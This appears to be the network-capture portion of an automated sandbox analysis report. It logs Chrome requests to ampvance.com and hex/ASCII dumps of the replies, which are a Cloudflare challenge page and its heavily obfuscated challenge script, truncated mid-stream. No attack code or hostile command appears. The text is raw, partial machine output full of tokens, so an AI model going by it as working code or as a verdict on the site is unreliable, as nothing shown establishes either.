                                                      X-CID: 2
                                                      2024-03-05 13:24:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.549716104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:34 UTC697OUTGET / HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: document
                                                      Referer: https://rfpcertstream.castlehillinfotech.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:34 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:24:34 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16113
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: BlbXXsUZ79kFum+/bfgQoBuje9WUo1Rww4tXwqEhd28yfzbkdBKEP2GMguaiSzgZXxTdMSN28yqRN3sXX5nMw7zomWT3VXyxxcFzHvYuXrAiaeBx18CcM2BGTfsw13uJO671VCT4I/S37W3o18zRvA==$BXP99XJchwqQDqFA0JMp1g==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:24:34 UTC405INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 58 63 65 4c 4d 39 25 32 46 31 35 51 46 79 4e 56 38 45 4b 4d 43 6d 73 52 62 32 25 32 46 65 72 32 4f 39 56 4e 32 30 76 4f 35 30 30 4b 68 79 37 4d 59 35 6e 77 4c 33 33 44 34 30 6d 64 55 4c 62 62 70 48 53 4d 41 44 57 55 31 44 51 36 44 6f 4f 75 46 25 32 46 68 6c 59 45 76 4d 33 41 44 4a 63 65 75 4c 6f 77 51 51 72 78 4c 76 4f 4a 56 5a 67 62 49 36 25 32 46 75 51 33 38 44 38 31 70 66 46 4a 6c 77 49 61 31 74 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XceLM9%2F15QFyNV8EKMCmsRb2%2Fer2O9VN20vO500Khy7MY5nwL33D40mdULbbpHSMADWU1DQ6DoOuF%2FhlYEvM3ADJceuLowQQrxLvOJVZgbI6%2FuQ38D81pfFJlwIa1tk%3D"}],"group":"cf-nel","max_age":604800}
                                                      2024-03-05 13:24:34 UTC1043INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74
                                                      Data Ascii: C9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJt
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 33 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62
                                                      Data Ascii: 3}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsb
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d
                                                      Data Ascii: ring div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:im
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e
                                                      Data Ascii: xt-decoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61
                                                      Data Ascii: DktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{ba
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61
                                                      Data Ascii: ;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ra
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f
                                                      Data Ascii: eta http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to co
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 49 4e 68 74 37 55 6e 77 44 49 65 50 4a 6f 54 66 6c 50 52 4a 6c 48 42 43 6a 5a 4c 41 74 43 71 6e 6f 43 5a 4b 46 36 53 32 49 49 6b 53 73 33 51 51 2e 61 4a 74 34 59 44 59 49 72 47 6a 31 71 6d 39 4b 44 2e 48 6a 50 53 50 64 50 37 4d 6e 68 52 6e 6c 34 54 4f 78 33 61 54 58 36 76 39 6d 61 4b 36 4c 6e 32 44 72 37 5a 4a 62 75 59 52 44 51 57 51 4f 46 53 65 68 41 56 41 61 74 45 52 42 46 36 36 58 6e 7a 61 32 6c 56 5a 6a 4e 36 67 4b 33 55 41 45 76 4c 6c 76 6d 66 57 34 44 57 6f 59 51 6e 37 77 65 68 66 4e 30 6b 74 5f 59 4e 67 48 34 50 47 65 73 75 64 76 62 51 4b 78 58 2e 6e 43 2e 6c 35 6f 6f 71 33 42 57 53 61 52 6a 63 74 47 55 72 56 35 6b 6a 58 71 59 76 56 31 70 6f 69 45 69 38 36 54 6c 44 45 66 71 57 68 6c 72 77 46 4b 4b 69 4d 61 4c 45 53 46 34 34 52 37 43 6d 43 5f 79 6e
                                                      Data Ascii: INht7UnwDIePJoTflPRJlHBCjZLAtCqnoCZKF6S2IIkSs3QQ.aJt4YDYIrGj1qm9KD.HjPSPdP7MnhRnl4TOx3aTX6v9maK6Ln2Dr7ZJbuYRDQWQOFSehAVAatERBF66Xnza2lVZjN6gK3UAEvLlvmfW4DWoYQn7wehfN0kt_YNgH4PGesudvbQKxX.nC.l5ooq3BWSaRjctGUrV5kjXqYvV1poiEi86TlDEfqWhlrwFKKiMaLESF44R7CmC_yn


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.549715104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:34 UTC939OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6d536af119eb HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/?__cf_chl_rt_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:34 UTC664INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:34 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ewEPA%2Br%2B2ywAfHIi6w6AlI3R7MLk0GhaB%2B%2FR%2BWQIfP419v1bQ1csDhJBxfPXqWjISYesq6dNG4q%2BQG54%2FaTGpDJPZtwrCtzdPedw3C6RCG2jMhSk0cx3n8BzRrkF44c%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d548d2a17f5-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:34 UTC705INData Raw: 37 64 31 61 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 74 72 75 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 6f 2c 66 7a 2c 66 41 2c 66 42 2c 66 43 2c 66 47 2c 66 48 2c 66 4e 2c 66 50 2c 66 54 2c 66 5a 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67
                                                      Data Ascii: 7d1awindow._cf_chl_opt.uaSR=true;window._cf_chl_opt.uaO=false;~function(io,fz,fA,fB,fC,fG,fH,fN,fP,fT,fZ,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,g
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 66 41 3d 66 7a 5b 69 6f 28 31 34 39 34 29 5d 2c 66 42 3d 7b 7d 2c 66 42 5b 69 6f 28 31 36 32 38 29 5d 3d 27 6f 27 2c 66 42 5b 69 6f 28 31 33 38 38 29 5d 3d 27 73 27 2c 66 42 5b 69 6f 28 34 37 32 29 5d 3d 27 75 27 2c 66 42 5b 69 6f 28 38 37 34 29 5d 3d 27 7a 27 2c 66 42 5b 69 6f 28 33 37 39 29 5d 3d 27 6e 27 2c 66 42 5b 69 6f 28 31 37 37 39 29 5d 3d 27 49 27 2c 66 42 5b 69 6f 28 31 38 39 30 29 5d 3d 27 62 27 2c 66 43 3d 66 42 2c 66 7a 5b 69 6f 28 31 36 37 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 69 73 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 73 3d 69 6f 2c 6f 3d 7b 27 62 59 4b 59 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 73 70 56 6c
                                                      Data Ascii: =this||self,fA=fz[io(1494)],fB={},fB[io(1628)]='o',fB[io(1388)]='s',fB[io(472)]='u',fB[io(874)]='z',fB[io(379)]='n',fB[io(1779)]='I',fB[io(1890)]='b',fC=fB,fz[io(1676)]=function(g,h,i,j,is,o,x,B,C,D,E,F){if(is=io,o={'bYKYn':function(G,H){return G<H},'spVl
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 28 6f 5b 69 75 28 31 38 30 30 29 5d 28 61 6d 2c 61 6e 29 29 2c 61 6f 3d 30 29 3a 61 70 2b 2b 2c 61 71 3e 3e 3d 31 2c 61 65 2b 2b 29 3b 7d 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 69 73 28 33 31 30 29 5d 5b 69 73 28 37 35 37 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 69 73 28 37 32 34 29 5d 28 43 2c 78 5b 69 73 28 31 39 35 35 29 5d 29 3b 43 2b 2b 29 69 66 28 6f 5b 69 73 28 31 38 34 38 29 5d 28 6f 5b 69 73 28 31 30 31 36 29 5d 2c 69 73 28 34 38 37 29 29 29 73 5b 69 73 28 37 35 37 29 5d 28 67 29 28 68 2e 69 29 3b 65 6c 73 65 20 69 66 28 44 3d 78 5b 43 5d 2c 45 3d 66 45 28 67 2c 68 2c 44 29 2c 6f 5b 69 73 28 39 31 31 29 5d 28 42 2c 45 29 29 7b 69 66 28 6f 5b 69 73 28 34 32 30 29 5d 3d 3d 3d 69 73 28 38 36 36 29
                                                      Data Ascii: (o[iu(1800)](am,an)),ao=0):ap++,aq>>=1,ae++);}}(x),B='nAsAaAb'.split('A'),B=B[is(310)][is(757)](B),C=0;o[is(724)](C,x[is(1955)]);C++)if(o[is(1848)](o[is(1016)],is(487)))s[is(757)](g)(h.i);else if(D=x[C],E=fE(g,h,D),o[is(911)](B,E)){if(o[is(420)]===is(866)
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 66 7a 5b 69 4c 28 31 38 31 37 29 5d 29 72 65 74 75 72 6e 3b 66 7a 5b 69 4c 28 31 38 31 37 29 5d 3d 21 21 5b 5d 7d 2c 66 50 3d 30 2c 66 53 28 29 2c 66 54 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 69 5a 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 69 5a 3d 69 6f 2c 66 3d 7b 27 68 63 66 58 77 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3d 3d 3d 6d 7d 2c 27 6c 58 50 48 71 27 3a 69 5a 28 31 34 36 33 29 2c 27 76 79 49 42 57 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 61 59 4a 61 63 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 2c 27 4e 58 47 4c 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 25 6d 7d 7d 2c 6b 2c 68 3d 33 32
                                                      Data Ascii: fz[iL(1817)])return;fz[iL(1817)]=!![]},fP=0,fS(),fT=function(c,iZ,f,g,h,i,j,k){for(iZ=io,f={'hcfXw':function(l,m){return l===m},'lXPHq':iZ(1463),'vyIBW':function(l,m){return l+m},'aYJac':function(l,m){return l(m)},'NXGLk':function(l,m){return l%m}},k,h=32
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 31 31 38 39 29 5d 5b 6a 36 28 31 33 36 39 29 5d 2c 27 2f 27 29 3a 27 27 2c 6d 3d 6a 5b 6a 36 28 31 39 35 34 29 5d 28 6a 5b 6a 36 28 31 39 35 34 29 5d 28 6a 5b 6a 36 28 31 39 35 34 29 5d 28 6a 5b 6a 36 28 31 38 34 35 29 5d 28 6a 36 28 31 36 39 30 29 2c 6c 29 2c 6a 36 28 37 39 33 29 29 2b 31 2b 6a 36 28 31 38 33 32 29 2b 66 7a 5b 6a 36 28 31 31 38 39 29 5d 5b 6a 36 28 37 37 36 29 5d 2c 27 2f 27 29 2b 66 7a 5b 6a 36 28 31 31 38 39 29 5d 5b 6a 36 28 37 34 30 29 5d 2b 27 2f 27 2c 66 7a 5b 6a 36 28 31 31 38 39 29 5d 5b 6a 36 28 31 38 38 31 29 5d 29 2c 6e 3d 6e 65 77 20 66 7a 5b 28 6a 36 28 32 36 35 29 29 5d 28 29 2c 21 6e 29 72 65 74 75 72 6e 3b 6f 3d 6a 5b 6a 36 28 31 38 31 38 29 5d 2c 6e 5b 6a 36 28 31 35 38 30 29 5d 28 6f 2c 6d 2c 21 21 5b 5d 29 2c 6e 5b 6a
                                                      Data Ascii: 1189)][j6(1369)],'/'):'',m=j[j6(1954)](j[j6(1954)](j[j6(1954)](j[j6(1845)](j6(1690),l),j6(793))+1+j6(1832)+fz[j6(1189)][j6(776)],'/')+fz[j6(1189)][j6(740)]+'/',fz[j6(1189)][j6(1881)]),n=new fz[(j6(265))](),!n)return;o=j[j6(1818)],n[j6(1580)](o,m,!![]),n[j
